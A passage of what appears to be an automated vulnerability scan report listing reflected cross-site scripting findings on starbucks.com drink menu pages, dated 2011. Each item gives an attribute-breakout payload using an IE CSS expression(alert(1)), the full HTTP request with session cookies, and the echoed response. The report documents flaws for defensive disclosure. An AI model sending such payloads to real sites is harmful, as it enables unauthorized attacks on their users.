The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccae7"style%3d"x%3aexpression(alert(1))"533387bf426 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccae7"style="x:expression(alert(1))"533387bf426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages?ccae7"style%3d"x%3aexpression(alert(1))"533387bf426=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:00 GMT
Connection: close
Content-Length: 52502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?ccae7"style="x:expression(alert(1))"533387bf426=1"/>
...[SNIP]...

2.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eff8"style%3d"x%3aexpression(alert(1))"8e1c5ef3e74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3eff8"style="x:expression(alert(1))"8e1c5ef3e74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee?3eff8"style%3d"x%3aexpression(alert(1))"8e1c5ef3e74=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:00 GMT
Connection: close
Content-Length: 45428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee?3eff8"style="x:expression(alert(1))"8e1c5ef3e74=1"/>
...[SNIP]...

2.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfdb4"style%3d"x%3aexpression(alert(1))"f631b1836 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfdb4"style="x:expression(alert(1))"f631b1836 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee?bfdb4"style%3d"x%3aexpression(alert(1))"f631b1836=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:06 GMT
Connection: close
Content-Length: 44981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee?bfdb4"style="x:expression(alert(1))"f631b1836=1"/>
...[SNIP]...

2.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dba1"style%3d"x%3aexpression(alert(1))"e2d7ccafcf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3dba1"style="x:expression(alert(1))"e2d7ccafcf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage?3dba1"style%3d"x%3aexpression(alert(1))"e2d7ccafcf6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:12 GMT
Connection: close
Content-Length: 43470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage?3dba1"style="x:expression(alert(1))"e2d7ccafcf6=1"/>
...[SNIP]...

2.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86623"style%3d"x%3aexpression(alert(1))"10adab1fa11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 86623"style="x:expression(alert(1))"10adab1fa11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee?86623"style%3d"x%3aexpression(alert(1))"10adab1fa11=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:15 GMT
Connection: close
Content-Length: 45260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee?86623"style="x:expression(alert(1))"10adab1fa11=1"/>
...[SNIP]...

2.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce1b8"style%3d"x%3aexpression(alert(1))"2d1316ff148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce1b8"style="x:expression(alert(1))"2d1316ff148 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee?ce1b8"style%3d"x%3aexpression(alert(1))"2d1316ff148=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:05 GMT
Connection: close
Content-Length: 43245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee?ce1b8"style="x:expression(alert(1))"2d1316ff148=1"/>
...[SNIP]...

2.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dfa"style%3d"x%3aexpression(alert(1))"3f1516979fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30dfa"style="x:expression(alert(1))"3f1516979fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme?30dfa"style%3d"x%3aexpression(alert(1))"3f1516979fe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:32 GMT
Connection: close
Content-Length: 45231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme?30dfa"style="x:expression(alert(1))"3f1516979fe=1"/>
...[SNIP]...

2.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6196e"style%3d"x%3aexpression(alert(1))"b0d39f9484b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6196e"style="x:expression(alert(1))"b0d39f9484b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee?6196e"style%3d"x%3aexpression(alert(1))"b0d39f9484b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:50 GMT
Connection: close
Content-Length: 45459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee?6196e"style="x:expression(alert(1))"b0d39f9484b=1"/>
...[SNIP]...

2.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c87"style%3d"x%3aexpression(alert(1))"ae192e3c688 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7c87"style="x:expression(alert(1))"ae192e3c688 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme?b7c87"style%3d"x%3aexpression(alert(1))"ae192e3c688=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:33 GMT
Connection: close
Content-Length: 45510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme?b7c87"style="x:expression(alert(1))"ae192e3c688=1"/>
...[SNIP]...

2.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea630"style%3d"x%3aexpression(alert(1))"09dc08373b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea630"style="x:expression(alert(1))"09dc08373b2 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee?ea630"style%3d"x%3aexpression(alert(1))"09dc08373b2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:15 GMT
Connection: close
Content-Length: 43324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee?ea630"style="x:expression(alert(1))"09dc08373b2=1"/>
...[SNIP]...

2.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61386"style%3d"x%3aexpression(alert(1))"1ed5d722818 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61386"style="x:expression(alert(1))"1ed5d722818 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee?61386"style%3d"x%3aexpression(alert(1))"1ed5d722818=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:08 GMT
Connection: close
Content-Length: 44974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee?61386"style="x:expression(alert(1))"1ed5d722818=1"/>
...[SNIP]...

2.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e38"style%3d"x%3aexpression(alert(1))"2b26c7960fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67e38"style="x:expression(alert(1))"2b26c7960fc in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee?67e38"style%3d"x%3aexpression(alert(1))"2b26c7960fc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:13 GMT
Connection: close
Content-Length: 45105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee?67e38"style="x:expression(alert(1))"2b26c7960fc=1"/>
...[SNIP]...

2.154. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ffa"style%3d"x%3aexpression(alert(1))"445beb5d76e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89ffa"style="x:expression(alert(1))"445beb5d76e in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme?89ffa"style%3d"x%3aexpression(alert(1))"445beb5d76e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
